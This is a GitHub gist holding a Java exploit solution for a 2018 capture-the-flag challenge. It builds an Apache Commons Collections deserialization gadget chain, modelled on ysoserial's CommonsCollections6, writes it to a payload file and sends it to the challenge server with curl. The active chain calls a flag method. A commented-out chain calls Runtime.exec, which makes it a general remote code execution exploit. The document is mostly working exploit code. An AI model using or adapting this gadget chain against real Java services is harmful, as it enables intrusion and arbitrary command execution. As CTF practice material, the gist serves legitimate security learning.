Created
September 15, 2018 08:06
-
-
Save shinh/a6671e6821c62104a20be97ddb925814 to your computer and use it in GitHub Desktop.
TMCTF 2018 misc-3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.*; | |
import java.util.*; | |
import javax.servlet.ServletInputStream; | |
import com.trendmicro.CustomOIS; | |
import com.trendmicro.Person; | |
import com.trendmicro.jail.Flag; | |
import org.apache.commons.collections.Factory; | |
import org.apache.commons.collections.Transformer; | |
import org.apache.commons.collections.*; | |
import org.apache.commons.collections.functors.*; | |
import org.apache.commons.collections.map.LazyMap; | |
import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.Constructor; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.InvocationTargetException; | |
import javax.management.BadAttributeValueExpException; | |
import sun.reflect.ReflectionFactory; | |
public class test { | |
public static ServletInputStream createServletInputStream2(ByteArrayOutputStream baos) { | |
final InputStream bais = new ByteArrayInputStream(baos.toByteArray()); | |
return new ServletInputStream() { | |
@Override | |
public int read() throws IOException { | |
return bais.read(); | |
} | |
}; | |
} | |
public static Serializable getObject(final String command) throws Exception { | |
final String[] execArgs = new String[] { command }; | |
/* | |
final Transformer[] transformers = new Transformer[] { | |
new ConstantTransformer(Runtime.class), | |
new InvokerTransformer("getMethod", new Class[] { | |
String.class, Class[].class }, new Object[] { | |
"getRuntime", new Class[0] }), | |
new InvokerTransformer("invoke", new Class[] { | |
Object.class, Object[].class }, new Object[] { | |
null, new Object[0] }), | |
new InvokerTransformer("exec", | |
new Class[] { String.class }, execArgs), | |
new ConstantTransformer(1) }; | |
*/ | |
final Transformer[] transformers = new Transformer[] { | |
new ConstantTransformer(new Flag()), | |
new InvokerTransformer( | |
"getFlag", | |
new Class[] {}, | |
new Object[] {}), | |
new ConstantTransformer("zzz") | |
}; | |
Transformer transformerChain = new ChainedTransformer(transformers); | |
final Map innerMap = new HashMap(); | |
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); | |
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); | |
/* | |
HashSet map = new HashSet(1); | |
map.add("foo"); | |
Field f = null; | |
try { | |
f = HashSet.class.getDeclaredField("map"); | |
} catch (NoSuchFieldException e) { | |
f = HashSet.class.getDeclaredField("backingMap"); | |
} | |
f.setAccessible(true); | |
HashMap innimpl = (HashMap) f.get(map); | |
*/ | |
HashMap map = new HashMap(); | |
map.put("foo", "bar"); | |
HashMap innimpl = map; | |
Field f2 = null; | |
try { | |
f2 = HashMap.class.getDeclaredField("table"); | |
} catch (NoSuchFieldException e) { | |
f2 = HashMap.class.getDeclaredField("elementData"); | |
} | |
f2.setAccessible(true); | |
Object[] array = (Object[]) f2.get(innimpl); | |
Object node = array[0]; | |
if(node == null){ | |
node = array[1]; | |
} | |
System.out.println("node=" + array); | |
System.out.println("node=" + array.length); | |
for (int i = 0; i < array.length; i++) { | |
System.out.println("array " + i + " " + array[i]); | |
} | |
System.out.println("node=" + node); | |
node = array[7]; | |
Field keyField = null; | |
try{ | |
keyField = node.getClass().getDeclaredField("key"); | |
}catch(Exception e){ | |
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); | |
} | |
keyField.setAccessible(true); | |
keyField.set(node, entry); | |
return map; | |
} | |
public static void main(String[] args) { | |
try { | |
Transformer[] transformers = new Transformer[] { | |
new ConstantTransformer(new Flag()), | |
new InvokerTransformer( | |
"getFlag", | |
new Class[] {}, | |
new Object[] {}), | |
new ConstantTransformer("zzz") | |
}; | |
final Transformer transformerChain = new ChainedTransformer(transformers); | |
final Map<String, String> map = | |
LazyMap.decorate(new HashMap<>(), transformerChain); | |
//map.get("xx"); | |
System.out.println("flag: "); | |
//Flag.getFlag(); | |
ByteArrayOutputStream baos = new ByteArrayOutputStream(); | |
ObjectOutputStream oos = new ObjectOutputStream(baos); | |
//oos.writeObject(new Integer(1234)); | |
//oos.writeObject(new Flag()); | |
//oos.writeObject(map); | |
//oos.writeObject(new Person("foobar")); | |
//oos.writeObject(new Mine()); | |
oos.writeObject(getObject("dummy")); | |
FileOutputStream fos = new FileOutputStream("payload"); | |
fos.write(baos.toByteArray()); | |
fos.close(); | |
System.out.println("go"); | |
//ServletInputStream sis = createServletInputStream("foo", "utf-8"); | |
ServletInputStream sis = createServletInputStream2(baos); | |
CustomOIS cois = new CustomOIS(sis); | |
Object o = cois.readObject(); | |
System.out.println("result: " + o); | |
} catch (IOException ios) { | |
System.out.println("" + ios); | |
} catch (ClassNotFoundException e) { | |
System.out.println("" + e); | |
} catch (Exception e) { | |
System.out.println("" + e); | |
} | |
} | |
} |
Run this Java code and
$ curl --data-binary '@payload' http://theflagmarshal.us-east-1.elasticbeanstalk.com/jail | grep TMCTF
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Reference: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections6.java